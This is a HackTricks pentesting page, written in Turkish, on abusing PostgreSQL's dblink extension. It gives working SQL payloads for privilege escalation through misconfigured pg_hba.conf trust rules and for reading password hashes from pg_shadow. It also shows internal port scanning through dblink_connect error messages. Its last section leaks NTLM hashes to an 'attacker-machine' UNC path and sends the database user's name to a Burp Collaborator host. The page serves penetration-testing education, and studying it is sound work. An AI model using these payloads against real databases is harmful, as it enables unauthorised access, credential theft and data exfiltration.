hacktricks/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md

98 lines
4.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Network - Privesc, Port Scanner ve NTLM yanıt ifşası
{{#include ../../../banners/hacktricks-training.md}}
**Daha fazla bilgi için** [**bu saldırılar hakkında orijinal makaleye göz atın**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).
**PostgreSQL 9.1**'den itibaren, ek modüllerin kurulumu basittir. [`dblink` gibi kayıtlı uzantılar](https://www.postgresql.org/docs/current/contrib.html) [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html) ile kurulabilir:
```sql
CREATE EXTENSION dblink;
```
Bir kez dblink yüklendiğinde, bazı ilginç numaralar yapabilirsiniz:
### Yetki Yükseltme
`pg_hba.conf` dosyası, **şifreyi bilmeye gerek kalmadan** **localhost'tan herhangi bir kullanıcı olarak** **bağlantılara izin verecek** şekilde kötü yapılandırılmış olabilir. Bu dosya genellikle `/etc/postgresql/12/main/pg_hba.conf` içinde bulunabilir ve kötü bir yapılandırma şöyle görünür:
```
local all all trust
```
_Not edin ki bu yapılandırma, admin şifreyi unuttuğunda bir db kullanıcısının şifresini değiştirmek için yaygın olarak kullanılır, bu yüzden bazen bunu bulabilirsiniz._\
_Ayrıca, pg_hba.conf dosyasının yalnızca postgres kullanıcısı ve grubu tarafından okunabilir ve yalnızca postgres kullanıcısı tarafından yazılabilir olduğunu unutmayın._
Bu durum, **eğer** kurbanın içinde **zaten** bir **shell**'iniz varsa **yararlıdır**, çünkü size postgresql veritabanına bağlanma imkanı verecektir.
Başka bir olası yanlış yapılandırma, şöyle bir şeydir:
```
host all all 127.0.0.1/32 trust
```
Bu, localhost'tan herkesin herhangi bir kullanıcı olarak veritabanına bağlanmasına izin verecektir.\
Bu durumda ve eğer **`dblink`** fonksiyonu **çalışıyorsa**, zaten kurulmuş bir bağlantı üzerinden veritabanına bağlanarak **yetki yükseltme** yapabilir ve erişim izni olmayan verilere erişebilirsiniz:
```sql
SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);
SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);
```
### Port Scanning
`dblink_connect`'i kötüye kullanarak **açık portları arayabilirsiniz**. Eğer o **fonksiyon çalışmıyorsa, belgelerde `dblink_connect_u()`'nun `dblink_connect()` ile aynı olduğu, ancak süper kullanıcı olmayanların herhangi bir kimlik doğrulama yöntemi kullanarak bağlanmasına izin vereceği belirtiliyor, bu yüzden `dblink_connect_u()`'yu denemelisiniz**.
```sql
SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR: could not establish connection
DETAIL: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?
// Port Filtered/Timeout
ERROR: could not establish connection
DETAIL: timeout expired
// Accessing HTTP server
ERROR: could not establish connection
DETAIL: timeout expired
// Accessing HTTPS server
ERROR: could not establish connection
DETAIL: received invalid response to SSL negotiation:
```
Not edin ki `dblink_connect` veya `dblink_connect_u` kullanmadan **önce** şunu çalıştırmanız gerekebilir:
```
CREATE extension dblink;
```
### UNC yolu - NTLM hash ifşası
```sql
-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
```
```sql
-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();
```
{{#include ../../../banners/hacktricks-training.md}}